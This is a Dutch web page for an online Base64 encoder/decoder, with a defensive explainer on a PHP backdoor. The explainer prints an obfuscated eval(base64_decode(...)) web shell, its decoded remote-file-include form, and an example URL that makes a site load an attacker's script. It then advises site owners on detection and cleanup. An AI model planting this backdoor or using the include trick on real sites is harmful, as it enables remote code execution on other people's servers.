Base64 plaatje | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Decoder - EncoderMet deze online Base64 decoder kunt u de tekst naar ASCII tekens coderen en decoderen het van Base64. Base64 wordt meest gebruikt in e-mail protocollen om binaire data zoals uitvoerbare bestanden of foto’s te kunnen overdragen. Ook spammers en hackers maken gebruik van Base64 om inhoud van hun scripts of berichten van eenvoudige antispam of antivirus programma’s of van menselijke ogen te verbergen. Voor het coderen of decoderen van Base64, plak je tekst in de textveld. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Base64 decode | encode
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Eval(base64_decodeEval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs=")); Als u iets wat er op lijkt in de code van uw website gevonden hebt, is het meest waarschijnlijk dat uw website is gehackt. Dit is een soort van backdoor in uw website. Gedecodeerd van Base64 word het if(isset($_GET["cmd"]))include $_GET["cmd"]; Een aanvaller kan programma’s die op zijn site zitten gewoon op uw website uitvoeren. Op deze manier worden zijn programma’s opgeroepen. http://www.yoursite.com/index.php?cmd=http://www.somesite.com/somescript.txt Somescript.txt kan zijn de code zoals dit system("dir"); waar ‘dir’ is de commando die op uw site uitgevoerd wordt. Gelukkig denkt de aanvaller niet over het feit dat alles wat met methode GET gedaan is, word in de web-server logs opgeslagen. Het is dus ook makkelijk om achter te komen wat er precies gedaan was. Als u zo een code in uw website gevonden hebt, het veranderen van alle uw wachtwoorden is de zaak, die als eerst gedaan moet worden. Verder, controleer de rechten (644 zou gewoon voldoende zijn, als er niks anders vereist wordt). Omdat database wachtwoord in de leesbare tekst opgeslagen wordt, gebruik dit wachtwoord alleen voor de database en nooit voor iets anders, bijvoorbeeld voor FTP of control panel. Maak geen gebruik van shared hosting, want het aantal van bedrijven die shared hosting bieden is veel hoger dan het aantal van informatie beveiliging specialisten. Als een website op de shared hosting is gehackt, het is makkelijk voor de om alle andere andere websites op hetzelfde server te hacken.
|